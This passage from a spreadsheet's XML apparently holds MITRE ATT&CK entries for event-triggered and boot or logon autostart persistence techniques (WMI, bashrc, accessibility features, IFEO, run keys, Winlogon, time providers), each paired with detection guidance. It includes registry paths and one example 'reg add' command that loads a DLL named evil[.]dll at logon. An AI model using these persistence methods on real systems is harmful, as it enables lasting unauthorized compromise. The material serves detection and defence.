Monitor processes and command-line arguments that can be used to register WMI persistence, such as the &lt;code&gt; Register-WmiEvent&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1086) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015)
Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)
WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.</t>
  </si>
  <si>
    <t>T1546.004</t>
  </si>
  <si>
    <t>.bash_profile and .bashrc</t>
  </si>
  <si>
    <t>While users may customize their &lt;code&gt;~/.bashrc&lt;/code&gt; and &lt;code&gt;~/.bash_profile&lt;/code&gt; files , there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by a user’s shell. &lt;code&gt;~/.bash_profile&lt;/code&gt; and &lt;code&gt;~/.bashrc&lt;/code&gt; are shell scripts that contain shell commands. These files are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly.
&lt;code&gt;~/.bash_profile&lt;/code&gt; is executed for login shells and &lt;code&gt;~/.bashrc&lt;/code&gt; is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), the &lt;code&gt;~/.bash_profile&lt;/code&gt; script is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, the &lt;code&gt;~/.bashrc&lt;/code&gt; script is executed. This allows users more fine-grained control over when they want certain commands executed. These shell scripts are meant to be written to by the local user to configure their own environment.
The macOS Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling &lt;code&gt;~/.bash_profile&lt;/code&gt; each time instead of &lt;code&gt;~/.bashrc&lt;/code&gt;.
Adversaries may abuse these shell scripts by inserting arbitrary shell commands that may be used to execute other binaries to gain persistence. Every time the user logs in or opens a new shell, the modified ~/.bash_profile and/or ~/.bashrc scripts will be executed.(Citation: amnesia malware)</t>
  </si>
  <si>
    <t>T1546.005</t>
  </si>
  <si>
    <t>Trap</t>
  </si>
  <si>
    <t>Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. 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as a persistence mechanism. Trap commands are of the following format &lt;code&gt;trap 'command list' signals&lt;/code&gt; where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)</t>
  </si>
  <si>
    <t>T1546.006</t>
  </si>
  <si>
    <t>LC_LOAD_DYLIB Addition</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Process monitoring,Binary file metadata</t>
  </si>
  <si>
    <t>Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. 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as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. (Citation: Malware Persistence on OS X)</t>
  </si>
  <si>
    <t>T1546.007</t>
  </si>
  <si>
    <t>Netsh Helper DLL</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,Windows Registry,DLL monitoring</t>
  </si>
  <si>
    <t>It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt; registry key for any new or suspicious entries that do not correlate with known system files or benign software. (Citation: Demaske Netsh Persistence)</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt;.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)</t>
  </si>
  <si>
    <t>T1546.008</t>
  </si>
  <si>
    <t>Accessibility Features</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,File monitoring,Windows Registry</t>
  </si>
  <si>
    <t>Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: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 (Citation: FireEye Hikit Rootkit)
Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in &lt;code&gt;%systemdir%\&lt;/code&gt;, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.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[Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)
* On-Screen Keyboard: &lt;code&gt;C:\Windows\System32\osk.exe&lt;/code&gt;
* Magnifier: &lt;code&gt;C:\Windows\System32\Magnify.exe&lt;/code&gt;
* Narrator: &lt;code&gt;C:\Windows\System32\Narrator.exe&lt;/code&gt;
* Display Switcher: &lt;code&gt;C:\Windows\System32\DisplaySwitch.exe&lt;/code&gt;
* App Switcher: &lt;code&gt;C:\Windows\System32\AtBroker.exe&lt;/code&gt;</t>
  </si>
  <si>
    <t>T1546.009</t>
  </si>
  <si>
    <t>AppCert DLLs</t>
  </si>
  <si>
    <t>Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017) 
Tools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)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</si>
  <si>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 xml:space="preserve">Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the &lt;code&gt;AppCertDLLs&lt;/code&gt; Registry key under &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\&lt;/code&gt; are loaded into every process that calls the ubiquitously used application programming interface (API) functions &lt;code&gt;CreateProcess&lt;/code&gt;, &lt;code&gt;CreateProcessAsUser&lt;/code&gt;, &lt;code&gt;CreateProcessWithLoginW&lt;/code&gt;, &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt;, or &lt;code&gt;WinExec&lt;/code&gt;. (Citation: Endgame Process Injection July 2017)
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity. </t>
  </si>
  <si>
    <t>T1546.010</t>
  </si>
  <si>
    <t>AppInit DLLs</t>
  </si>
  <si>
    <t>Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry values for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as &lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt;. (Citation: Endgame Process Injection July 2017)
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs. (Citation: TechNet Autoruns)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</si>
  <si>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Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the &lt;code&gt;AppInit_DLLs&lt;/code&gt;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 (Citation: Endgame Process Injection July 2017)
Similar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry) Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity. 
The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)</t>
  </si>
  <si>
    <t>T1546.011</t>
  </si>
  <si>
    <t>Application Shimming</t>
  </si>
  <si>
    <t>There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):
* Shim-Process-Scanner - checks memory of every running process for any shim flags
* Shim-Detector-Lite - detects installation of custom shim databases
* Shim-Guard - monitors registry for any shim installations
* ShimScanner - forensic tool to find active shims in memory
* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)
Monitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. 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(Citation: Endgame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
* &lt;code&gt;%WINDIR%\AppPatch\sysmain.sdb&lt;/code&gt; and
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb&lt;/code&gt;
Custom databases are stored in:
* &lt;code&gt;%WINDIR%\AppPatch\custom &amp; %WINDIR%\AppPatch\AppPatch64\Custom&lt;/code&gt; and
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom&lt;/code&gt;
To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).
Utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.</t>
  </si>
  <si>
    <t>T1546.012</t>
  </si>
  <si>
    <t>Image File Execution Options Injection</t>
  </si>
  <si>
    <t>API monitoring,Windows event logs,Windows Registry,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as &lt;code&gt;DEBUG_PROCESS&lt;/code&gt; and &lt;code&gt;DEBUG_ONLY_THIS_PROCESS&lt;/code&gt;. (Citation: Microsoft Dev Blog IFEO Mar 2010)
Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as &lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt;. (Citation: Endgame Process Injection July 2017)</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., &lt;code&gt;C:\dbg\ntsd.exe -g  notepad.exe&lt;/code&gt;). (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as &lt;code&gt;Debugger&lt;/code&gt; values in the Registry under &lt;code&gt;HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\&lt;executable&gt;&lt;/code&gt; where &lt;code&gt;&amp;lt;executable&amp;gt;&lt;/code&gt; is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\&lt;/code&gt;. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Endgame Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.
Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)</t>
  </si>
  <si>
    <t>T1546.013</t>
  </si>
  <si>
    <t>PowerShell Profile</t>
  </si>
  <si>
    <t>PowerShell logs,File monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Locations where &lt;code&gt;profile.ps1&lt;/code&gt; can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:
* &lt;code&gt;$PsHome\Profile.ps1&lt;/code&gt;
* &lt;code&gt;$PsHome\Microsoft.{HostProgram}_profile.ps1&lt;/code&gt;
* &lt;code&gt;$Home\My Documents\PowerShell\Profile.ps1&lt;/code&gt;
* &lt;code&gt;$Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1&lt;/code&gt;
Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.</t>
  </si>
  <si>
    <t>Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile  (&lt;code&gt;profile.ps1&lt;/code&gt;) is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) starts and can be used as a logon script to customize user environments.
[PowerShell](https://attack.mitre.org/techniques/T1059/001) supports several profiles depending on the user or host program. For example, there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles) 
Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) session the modified script will be executed unless the &lt;code&gt;-NoProfile&lt;/code&gt; flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) 
An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)</t>
  </si>
  <si>
    <t>T1546.014</t>
  </si>
  <si>
    <t>Emond</t>
  </si>
  <si>
    <t>Monitor emond rules creation by checking for files created or modified in &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; and &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at &lt;code&gt;/sbin/emond&lt;/code&gt; will load any rules from the &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; directory and take action once an explicitly defined event takes place.
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at&lt;code&gt;/System/Library/LaunchDaemons/com.apple.emond.plist&lt;/code&gt;.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.</t>
  </si>
  <si>
    <t>T1546.015</t>
  </si>
  <si>
    <t>Component Object Model Hijacking</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,Loaded DLLs,DLL monitoring,Windows Registry</t>
  </si>
  <si>
    <t xml:space="preserve">There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary paths with unknown paths or otherwise malicious content. Even though some third-party applications define user COM objects, the presence of objects within HKEY_CURRENT_USER\Software\Classes\CLSID\ may be anomalous and should be investigated since user objects will be loaded prior to machine objects in HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\.(Citation: Endgame COM Hijacking)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correlated with a COM object Registry modification may indicate COM hijacking has been performed. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model)  References to various COM objects are stored in the Registry. 
Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. </t>
  </si>
  <si>
    <t>T1547</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution</t>
  </si>
  <si>
    <t>Monitor for additions or modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry. Look for changes that are not correlated with known updates, patches, or other planned administrative activity. Tools such as Sysinternals Autoruns may also be used to detect system autostart configuration changes that could be attempts at persistence.(Citation: TechNet Autoruns)  Changes to some autostart configuration settings may happen under normal conditions when legitimate software is installed. 
Suspicious program execution as autostart programs may show up as outlier processes that have not been seen before when compared against historical data.To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
Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL.
Monitor for abnormal usage of utilities and command-line parameters involved in kernel modification or driver installation.</t>
  </si>
  <si>
    <t>Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.</t>
  </si>
  <si>
    <t>T1547.001</t>
  </si>
  <si>
    <t>Registry Run Keys / Startup Folder</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring</t>
  </si>
  <si>
    <t>Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.
Changes to these locations typically happen under normal conditions when legitimate software is installed.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</si>
  <si>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Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.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 (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: &lt;code&gt;reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"&lt;/code&gt; (Citation: Oddvar Moe RunOnceEx Mar 2018)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The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit&lt;/code&gt; and &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell&lt;/code&gt; subkeys can automatically launch programs.
Programs listed in the load value of the registry key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; run when any user logs on.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t>
  </si>
  <si>
    <t>T1547.002</t>
  </si>
  <si>
    <t>Authentication Package</t>
  </si>
  <si>
    <t>DLL monitoring,Windows Registry,Loaded DLLs</t>
  </si>
  <si>
    <t>Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t>Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: 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Packages"=&amp;lt;target binary&amp;gt;&lt;/code&gt;. The binary will then be executed by the system when the authentication packages are loaded.</t>
  </si>
  <si>
    <t>T1547.003</t>
  </si>
  <si>
    <t>Time Providers</t>
  </si>
  <si>
    <t>API monitoring,Binary file metadata,DLL monitoring,File monitoring,Loaded DLLs,Process monitoring</t>
  </si>
  <si>
    <t>Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as &lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt; as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)
The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)
Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of  &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\&lt;/code&gt;. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider)
Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017)</t>
  </si>
  <si>
    <t>T1547.004</t>
  </si>
  <si>
    <t>Winlogon Helper DLL</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process monitoring</t>
  </si>
  <si>
    <t>Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns)  New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.
Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in &lt;code&gt;HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\&lt;/code&gt; and &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\&lt;/code&gt; are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) 
Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)
* Winlogon\Notify - points to notification package DLLs that handle Winlogon events
* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on
Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.</t>
  </si>
  <si>
    <t>T1547.005</t>
  </si>
  <si>
    <t>Security Support Provider</t>
  </si>
  <si>
    <t>Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t>Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows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t>
  </si>
  <si>
    <t>T1547.006</t>
  </si>
  <si>
    <t>Kernel Modules and Extensions</t>
  </si>
  <si>
    <t>Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:&lt;code&gt;modprobe&lt;/code&gt;, &lt;code&gt;insmod&lt;/code&gt;, &lt;code&gt;lsmod&lt;/code&gt;, &lt;code&gt;rmmod&lt;/code&gt;, or &lt;code&gt;modinfo&lt;/code&gt; (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into &lt;code&gt;/lib/modules&lt;/code&gt; and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
For macOS, monitor for execution of &lt;code&gt;kextload&lt;/code&gt; commands and correlate with other unknown or suspicious activity.
Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: &lt;code&gt;apt-get install linux-headers-$(uname -r)&lt;/code&gt; On RHEL and CentOS based systems this can be accomplished by running: &lt;code&gt;yum install kernel-devel-$(uname -r)&lt;/code&gt;</t>
  </si>
  <si>
    <t>Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules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 (Citation: Linux Kernel Programming) 
